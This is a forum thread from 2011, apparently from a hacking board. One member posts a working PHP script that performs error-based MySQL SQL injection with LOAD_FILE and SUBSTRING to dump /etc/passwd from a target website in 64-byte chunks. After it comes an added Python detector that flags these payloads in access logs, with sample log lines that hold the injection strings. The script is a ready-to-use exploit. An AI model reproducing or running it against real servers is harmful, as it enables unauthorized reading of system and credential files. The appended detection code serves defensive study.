Algorithm for implementing an ERROR-BASED injection

Discussion in 'PHP' started by Cennarios, 6 Nov 2011.

  1. Cennarios

    Cennarios Elder - Elder

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Hello! I need an idea for a concrete implementation of dumping a file via error-based injection, written in PHP.

    Maybe someone has seen a working script for this task.

    Thanks in advance!
     
  2. Cennarios

    Algorithm.

    Profit. The limit is the pos argument of substring() (max file size).
     
    #2 Cennarios, 15 Nov 2011
    Last edited: 15 Nov 2011
  3. Cennarios

    Since it went unanswered, I'm posting it myself.

    PHP:
    function prep_packet($host, $uri = NULL, $user_agent = NULL, $method = 'GET') {
        // Raw HTTP/1.1 request, one header line per array element
        $packet = array(
            "$method /$uri HTTP/1.1\r\n",
            "Host: $host\r\n",
            "User-Agent: $user_agent\r\n",
            "Content-Type: application/x-www-form-urlencoded\r\n",
            "Connection: close\r\n\r\n"
        );
        return $packet;
    }

    function tcp_send($host, $port, $packet) {
        $answer  = '';
        $packet_ = '';
        // 2-second connect timeout; connection errors are suppressed and the caller gets an empty answer
        $fp = @fsockopen($host, $port, $errnum, $errstr, 2);
        if ($fp) {
            foreach ($packet as $row) {
                $packet_ .= $row;
            }
            fputs($fp, $packet_);
            while (!feof($fp)) {
                $answer .= fread($fp, 1024);
            }
            fclose($fp);
        }
        return $answer;
    }

    function transmission_by_proxy($proxyhost, $proxyport, $packet) {
        $biteZ_ = tcp_send($proxyhost, $proxyport, $packet);
        return $biteZ_;
    }

    function errbased($stack) {
        $packet = prep_packet($stack['host'], $stack['uri']);
        if (!is_array($packet)) die();
        $biteX = transmission_by_proxy($stack['proxyhost'], $stack['proxyport'], $packet);
        if (!is_string($biteX)) die();
        return $biteX;
    }

    function dump($stack, $stopbite = NULL) {
        if (!is_string($stack['filepath'])) die();

        $pref = "$stopbite+or+1+group+by+concat((select+";
        $dstr = '';
        // Step 1: read the file length out of the "Duplicate entry '...1' for key" error
        $stack['sqlInj'] = $pref . "CHAR_LENGTH(load_file('" . $stack['filepath'] . "'))),floor(rand(0)*2))+having+min(0)--+";
        $stack['uri']    = $stack['path'] . $stack['sqlInj'];
        preg_match_all("/entry \'(.*)1\' for/Uis", errbased($stack), $biteS);
        $fsize = (integer)$biteS[1][0];
        unset($stack['sqlInj']);
        unset($stack['uri']);

        $i = 1;
        // Step 2: fetch the file 64 bytes per request; substring() positions are 1-based
        while ($i <= $fsize) {
            $i += 64;
            $stack['sqlInj'] = $pref . "substring(load_file('" . $stack['filepath'] . "')," . ($i - 64) . ",64)),floor(rand(0)*2))+having+min(0)--+";
            $stack['uri']    = $stack['path'] . $stack['sqlInj'];
            preg_match_all("/entry \'(.*?)\' for/Uis", errbased($stack), $biteV);
            if (!isset($biteV[1][0])) {
                return $dstr;
            }
            $dstr .= $biteV[1][0];
        }
        return $dstr;
    }

    $stack['host']      = 'www.xxx.com';
    $stack['path']      = 'event.php?eventid=-123';
    $stack['proxyhost'] = 'www.xxx.com';
    $stack['proxyport'] = 80;
    $stack['filepath']  = '/etc/passwd';

    $passwd = dump($stack, "'");

    echo $passwd;
     
    2 people like this.
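Detection logic for the request pattern the script in post #3 generates, added here as an example (not part of the original post): it URL-decodes each request target from constructed access-log lines and flags the GROUP BY / CONCAT / FLOOR(RAND(0)*2) / HAVING MIN(0) and LOAD_FILE() signatures. The log lines, signature names and the classify_request/scan_log functions are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the error-based technique shown above: the duplicate-entry trick
# (GROUP BY CONCAT(..., FLOOR(RAND(0)*2)) HAVING MIN(0)) and LOAD_FILE()/SUBSTRING() reads.
SIGNATURES = {
    "rand_groupby":   re.compile(r"group\s+by\s+concat\s*\(.*floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I | re.S),
    "having_min":     re.compile(r"having\s+min\s*\(\s*0\s*\)", re.I),
    "load_file":      re.compile(r"load_file\s*\(", re.I),
    "substring_loop": re.compile(r"substring\s*\(\s*load_file", re.I),
}

# Apache/nginx combined-style access log: ip ident user [ts] "method target proto" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(target):
    """Return the set of signature names found in a URL-encoded request target."""
    decoded = unquote_plus(target)  # '+' and %xx escapes become the SQL the server saw
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan_log(lines):
    """Return (ip, decoded target, signatures) for every request matching at least one signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        found = classify_request(m.group("target"))
        if found:
            hits.append((m.group("ip"), unquote_plus(m.group("target")), found))
    return hits

# Constructed sample access-log lines (illustrative; not taken from the original post).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Nov/2011:10:00:01 +0000] "GET /event.php?eventid=123 HTTP/1.1" 200 512',
    '203.0.113.9 - - [15/Nov/2011:10:00:02 +0000] "GET /event.php?eventid=-123\'+or+1+group+by+concat((select+CHAR_LENGTH(load_file(\'/etc/passwd\'))),floor(rand(0)*2))+having+min(0)--+ HTTP/1.1" 500 231',
    '203.0.113.9 - - [15/Nov/2011:10:00:03 +0000] "GET /event.php?eventid=-123\'+or+1+group+by+concat((select+substring(load_file(\'/etc/passwd\'),1,64)),floor(rand(0)*2))+having+min(0)--+ HTTP/1.1" 500 240',
]

if __name__ == "__main__":
    for ip, target, sigs in scan_log(SAMPLE_LOG):
        print(ip, sorted(sigs), target[:70])
```

A burst of such requests from one source, each advancing the substring() offset by 64 and each answered with a 500, is the file-dump loop of the script above seen from the server side.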